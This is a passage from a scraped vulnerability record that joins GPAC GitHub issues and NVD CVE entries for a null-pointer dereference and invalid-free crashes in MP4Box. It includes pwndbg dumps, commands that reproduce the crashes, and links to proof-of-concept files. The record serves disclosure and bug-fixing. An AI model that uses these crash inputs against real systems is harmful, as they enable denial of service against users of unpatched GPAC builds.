—▸ 0x5555555df280 —▸ 0x5555555df2a0 ◂— 0x800000030000041a RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff6d40 —▸ 0x5555555df280 —▸ 0x5555555df2a0 ◂— 0x800000030000041a ... ↓ 2 skipped 03:0018│ 0x7fffffff6d58 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff6d60 ◂— 0x41a ... ↓ 2 skipped 07:0038│ 0x7fffffff6d78 ◂— 0x5c21095cb581c200 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b55c63 lsr_read_foreignObject+99 f 2 0x7ffff7b5abb0 lsr_read_scene_content_model+1248 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b60795 lsr_read_svg+885 f 5 0x7ffff7b575c7 lsr_read_command_list+759 f 6 0x7ffff7b59914 lsr_decode_laser_unit+708 f 7 0x7ffff7b6204d gf_laser_decode_command_list+333 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b55c63 in lsr_read_foreignObject () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5abb0 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ``` poc_18 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x0 RDI 0x5555555de970 —▸ 0x5555555dee00 —▸ 0x5555555dedb0 ◂— 0x0 RSI 0x1 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x5555555dee88 ◂— 0x0 R13 0x2 R14 0x4 R15 0x1 RBP 0x5555555dcc30 —▸ 0x5555555d26d0 ◂— 0x0 RSP 0x7fffffff6d80 —▸ 0x5555555df1f0 —▸ 0x5555555df210 ◂— 0x8000000300000415 RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff6d80 —▸ 0x5555555df1f0 —▸ 0x5555555df210 ◂— 0x8000000300000415 ... ↓ 2 skipped 03:0018│ 0x7fffffff6d98 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff6da0 ◂— 0x415 ... ↓ 2 skipped 07:0038│ 0x7fffffff6db8 ◂— 0x812c333cc038400 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b5d22e lsr_read_ellipse+78 f 2 0x7ffff7b5abc8 lsr_read_scene_content_model+1272 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b60795 lsr_read_svg+885 f 5 0x7ffff7b575c7 lsr_read_command_list+759 f 6 0x7ffff7b59914 lsr_decode_laser_unit+708 f 7 0x7ffff7b6204d gf_laser_decode_command_list+333 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5d22e in lsr_read_ellipse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5abc8 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```
Null Pointer Dereference in lsr_read_id.part()
https://api.github.com/repos/gpac/gpac/issues/1979/comments
1
2021-12-11T09:14:24Z
2021-12-13T13:22:41Z
https://github.com/gpac/gpac/issues/1979
1,077,478,960
1,979
2,909
CVE-2021-45262
2021-12-22T18:15:08.140
An invalid free vulnerability exists in gpac 1.1.0 via the gf_sg_command_del function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1980" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1980" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1980
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid free was discovered in gf_sg_command_del(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ./poc/poc_17 ``` [poc_17.zip](https://github.com/gpac/gpac/files/7696726/poc_17.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type prl in parent dref [iso file] Incomplete box mdat - start 11495 size 860323 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type prl in parent dref [iso file] Incomplete box mdat - start 11495 size 860323 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [MP4 Loading] decoding sample 1 from track ID 8 failed free(): invalid pointer [1] 3334251 abort ./MP4Box -bt ./poc/poc_17 ``` **gdb** ``` free(): invalid pointer Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffff6f20 ◂— 0x0 R8 0x0 R9 0x7fffffff6f20 ◂— 0x0 R10 0x8 R11 0x246 R12 0x7fffffff7190 ◂— 0x0 R13 0x10 R14 0x7ffff7ffb000 ◂— 0x6565726600001000 R15 0x1 RBP 0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 RSP 0x7fffffff6f20 ◂— 0x0 RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0 01:0008│ 0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */ 02:0010│ 0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff6f40 ◂— 0x0 05:0028│ 0x7fffffff6f48 ◂— 0x0 06:0030│ 0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0 07:0038│ 0x7fffffff6f58 ◂— 0x0 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d5cac _int_free+748 f 5 0x7ffff784f461 gf_sg_command_del+353 f 6 0x7ffff7a88203 gf_sm_del+195 f 7 0x555555584423 dump_isom_scene+627 ───────────────────────────────────────────────────────────────────────────────────────── ``` `break gf_svg_delete_attribute_value` ``` pwndbg> 0x00007ffff784f45c in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x5555555df310 ◂— 0x0 *RDX 0x5555555d4370 ◂— 0x0 RDI 0x0 RSI 0x5555555df300 ◂— 0x0 R8 0x2 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555df2e0 ◂— 0x0 R13 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 R14 0x5555555d4370 ◂— 0x0 R15 0x0 RBP 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 RSP 0x7fffffff7310 ◂— 0x1 *RIP 0x7ffff784f45c (gf_sg_command_del+348) ◂— call 0x7ffff78c7fb0 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── 0x7ffff784f449 <gf_sg_command_del+329> mov rsi, qword ptr [r12 + 8] 0x7ffff784f44e <gf_sg_command_del+334> test rsi, rsi 0x7ffff784f451 <gf_sg_command_del+337> je gf_sg_command_del+255 <gf_sg_command_del+255> 0x7ffff784f453 <gf_sg_command_del+339> mov edi, dword ptr [r12 + 4] 0x7ffff784f458 <gf_sg_command_del+344> mov rdx, qword ptr [rbp] ► 0x7ffff784f45c <gf_sg_command_del+348> call gf_svg_delete_attribute_value <gf_svg_delete_attribute_value> rdi: 0x0 rsi: 0x5555555df300 ◂— 0x0 rdx: 0x5555555d4370 ◂— 0x0 rcx: 0x5555555df310 ◂— 0x0 0x7ffff784f461 <gf_sg_command_del+353> jmp gf_sg_command_del+255 <gf_sg_command_del+255> 0x7ffff784f463 <gf_sg_command_del+355> nop dword ptr [rax + rax] 0x7ffff784f468 <gf_sg_command_del+360> mov rdi, qword ptr [r12 + 8] 0x7ffff784f46d <gf_sg_command_del+365> test rdi, rdi 0x7ffff784f470 <gf_sg_command_del+368> je gf_sg_command_del+384 <gf_sg_command_del+384> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff7310 ◂— 0x1 01:0008│ 0x7fffffff7318 ◂— 0x5cf4ff747866de00 02:0010│ 0x7fffffff7320 —▸ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff7328 —▸ 0x5555555defe0 ◂— 0x8 04:0020│ 0x7fffffff7330 —▸ 0x5555555df130 ◂— 0x0 05:0028│ 0x7fffffff7338 —▸ 0x7ffff7a88203 (gf_sm_del+195) ◂— jmp 0x7ffff7a881c8 06:0030│ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 07:0038│ 0x7fffffff7348 ◂— 0x5cf4ff747866de00 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff784f45c gf_sg_command_del+348 f 1 0x7ffff7a88203 gf_sm_del+195 f 2 0x555555584423 dump_isom_scene+627 f 3 0x55555557b42c mp4boxMain+9228 f 4 0x7ffff75630b3 __libc_start_main+243 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> free(): invalid pointer Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 *RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 *RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] *RDX 0x0 *RDI 0x2 *RSI 0x7fffffff6f20 ◂— 0x0 *R8 0x0 *R9 0x7fffffff6f20 ◂— 0x0 *R10 0x8 *R11 0x246 *R12 0x7fffffff7190 ◂— 0x0 *R13 0x10 *R14 0x7ffff7ffb000 ◂— 0x6565726600001000 *R15 0x1 *RBP 0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 *RSP 0x7fffffff6f20 ◂— 0x0 *RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0 01:0008│ 0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */ 02:0010│ 0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff6f40 ◂— 0x0 05:0028│ 0x7fffffff6f48 ◂— 0x0 06:0030│ 0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0 07:0038│ 0x7fffffff6f58 ◂— 0x0 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d5cac _int_free+748 f 5 0x7ffff784f461 gf_sg_command_del+353 f 6 0x7ffff7a88203 gf_sm_del+195 f 7 0x555555584423 dump_isom_scene+627 ```
Invalid free in gf_sg_command_del()
https://api.github.com/repos/gpac/gpac/issues/1980/comments
0
2021-12-11T09:14:52Z
2021-12-13T13:22:09Z
https://github.com/gpac/gpac/issues/1980
1,077,479,083
1,980
2,910
CVE-2021-45263
2021-12-22T18:15:08.180
An invalid free vulnerability exists in gpac 1.1.0 via the gf_svg_delete_attribute_value function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1975" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1975" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1975
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid free was discovered in gf_svg_delete_attribute_value(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr ./poc/poc_12 ``` [poc_12.zip](https://github.com/gpac/gpac/files/7696155/poc_12.zip) **Result** ``` ./MP4Box -lsr ./poc/poc_12 [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 803523 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 803523 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import [LASeR] sametext coded in bitstream but no text defined ! [LASeR] samerect coded in bitstream but no rect defined ! [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [MP4 Loading] decoding sample 1 from track ID 8 failed [1] 4148207 segmentation fault ./MP4Box -lsr ./poc/poc_12 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 3102 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7040 ◂— 0x0 RIP 0x7ffff75d9870 (free+32) ◂— mov rax, qword ptr [rdi - 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 